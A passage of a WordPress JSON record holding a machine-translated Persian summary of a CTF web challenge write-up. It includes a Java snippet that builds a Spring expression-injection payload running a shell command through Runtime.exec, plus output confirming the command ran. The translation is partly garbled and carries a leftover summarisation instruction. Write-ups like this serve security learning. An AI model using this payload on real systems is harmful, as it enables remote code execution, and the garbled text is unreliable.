\u0627\u0644\u06af\u0648 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc \u062f\u0647\u062f (\u0634\u0645\u0627 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u0628\u06cc\u0634\u062a\u0631 \u0628\u062e\u0648\u0627\u0646\u06cc\u062f).<br \/>\u0633\u0627\u062e\u062a \u0628\u0627\u0631<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight java\"><code><span class=\"kt\">byte<\/span><span class=\"o\">[]<\/span> <span class=\"n\">data<\/span> <span class=\"o\">=<\/span> <span class=\"s\">\"{\\\"role\\\":\\\"__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('touch \/tmp\/zz').getInputStream()).next()}__::z\\\"}\"<\/span><span class=\"o\">.<\/span><span class=\"na\">getBytes<\/span><span class=\"o\">();<\/span>\n<span class=\"kt\">byte<\/span><span class=\"o\">[]<\/span> <span class=\"n\">outBase64<\/span> <span class=\"o\">=<\/span> <span class=\"nc\">Base64<\/span><span class=\"o\">.<\/span><span class=\"na\">getMimeEncoder<\/span><span class=\"o\">().<\/span><span class=\"na\">encode<\/span><span class=\"o\">(<\/span><span class=\"n\">data<\/span><span class=\"o\">);<\/span>\n<span class=\"nc\">String<\/span> <span class=\"n\">payload<\/span> <span class=\"o\">=<\/span> <span class=\"o\">(<\/span><span class=\"k\">new<\/span> <span class=\"nc\">String<\/span><span class=\"o\">(<\/span><span class=\"n\">outBase64<\/span><span class=\"o\">)).<\/span><span class=\"na\">replaceAll<\/span><span class=\"o\">(<\/span> <span class=\"s\">\"\\\\r\\\\n\"<\/span><span class=\"o\">,<\/span> <span class=\"s\">\"\"<\/span><span class=\"o\">).<\/span><span class=\"na\">replaceAll<\/span><span class=\"o\">(<\/span> <span class=\"s\">\"https:\/\/dev.to\/\"<\/span><span class=\"o\">,<\/span> <span class=\"s\">\"_\"<\/span><span class=\"o\">);<\/span>\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u0627\u0646\u062c\u0627\u0645 \u0645\u0627\u06cc\u0646\u06cc\u0646\u06af<br \/><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ovh7al6rwotbkcbenxc.png\" alt=\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a \u062a\u0635\u0648\u06cc\u0631\" loading=\"lazy\" width=\"800\" height=\"155\" title=\"\"><\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>$ ls -lap \/tmp\ntotal 24\ndrwxrwxrwt 1 root root 4096 Nov 14 17:15 .\/\ndrwxr-xr-x 1 root root 4096 Nov 14 17:14 ..\/\ndrwxr-xr-x 2 app  app  4096 Nov 14 17:14 hsperfdata_app\/\n-rw-r--r-- 1 app  app     0 Nov 14 17:15 zz\n$\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u062e\u0648\u0627\u0646\u062f\u0646 \u067e\u0631\u0686\u0645 \u0648 \u0627\u0631\u0633\u0627\u0644 \u0622\u0646 \u0628\u0647 \u0633\u0631\u0648\u0631 \u0645\u0634\u0627\u0628\u0647 \u0645\u0648\u0627\u0631\u062f \u0641\u0648\u0642 \u0627\u0633\u062a<\/p>\n<p><small><small><em>\u0627\u0632 \u0627\u0648\u0644 \u062a\u0627 \u0622\u062e\u0631 \u0645\u0633\u0627\u0628\u0642\u0627\u062a \u0641\u0642\u0637 \u0628\u0644\u062f \u0628\u0648\u062f\u0645 \u062d\u0645\u0644\u0647 \u06a9\u0646\u0645 \u0648 \u0645\u062f\u0627\u0645 \u0645\u0648\u0631\u062f \u062d\u0645\u0644\u0647 \u0642\u0631\u0627\u0631 \u0628\u06af\u06cc\u0631\u0645… \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a \u0646\u062a\u0627\u06cc\u062c \u062e\u06cc\u0644\u06cc \u062e\u0648\u0628 \u0646\u0628\u0648\u062f. \u0645\u0646 \u0646\u0645\u06cc \u062f\u0627\u0646\u0645 \u0633\u0641\u0631 CTF \u0686\u0642\u062f\u0631 \u0637\u0648\u0644\u0627\u0646\u06cc \u0628\u0648\u062f\u0647 \u0627\u0633\u062a\u060c \u0627\u0645\u0627 \u062a\u0627 \u0628\u0647 \u0627\u0645\u0631\u0648\u0632 \u0647\u0646\u0648\u0632 \u0628\u0631\u0627\u06cc \u062a\u06cc\u0645 \u06cc\u06a9 \u0645\u0648\u0641\u0642\u06cc\u062a \u0627\u0633\u062a \u2639.<\/em><\/small><\/small><\/p>\n<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Summarize this content to 400 words in Persian Lang \u0645\u0646 \u0645\u06cc \u062e\u0648\u0627\u0647\u0645 \u0645\u0633\u06cc\u0631 \u062e\u0648\u062f \u0631\u0627 \u062f\u0631 \u0645\u0642\u0627\u0644\u0647 \u0648\u0628 2 \u0628\u0647 \u0627\u0634\u062a\u0631\u0627\u06a9 \u0628\u06af\u0630\u0627\u0631\u0645\u0647\u0646\u06af\u0627\u0645 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0686\u0627\u0644\u0634\u060c \u0648\u0628 \u0633\u0627\u06cc\u062a \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0631\u0627 \u0646\u0645\u0627\u06cc\u0634 \u0645\u06cc \u062f\u0647\u062f\u062a\u0633\u0648\u0628\u0627 \u062e\u0648\u0627\u0646\u062f\u0646 \u06a9\u062f \u0645\u0646\u0628\u0639\u060c \u062e\u0648\u0627\u0647\u06cc\u062f \u062f\u06cc\u062f \u06a9\u0647 \u0686\u0627\u0644\u0634 \u0634\u0627\u0645\u0644 2 \u0633\u0631\u0648\u06cc\u0633 \u0627\u0633\u062a: \u0628\u0631\u06af\u0634\u062a \u0648 \u062c\u0644\u0648. \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f \u0628\u0631\u06af\u0634\u062a \u062d\u0627\u0648\u06cc \u067e\u0631\u0686\u0645 \u0627\u0633\u062a\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0627\u0628\u062a\u062f\u0627 …<\/p>\n","protected":false},"author":2,"featured_media":89121,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","footnotes":""},"categories":[339],"tags":[],"class_list":["post-89120","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-dev"],"_links":{"self":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts\/89120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/comments?post=89120"}],"version-history":[{"count":0,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts\/89120\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/media\/89121"}],"wp:attachment":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/media?parent=89120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/categories?post=89120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/tags?post=89120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}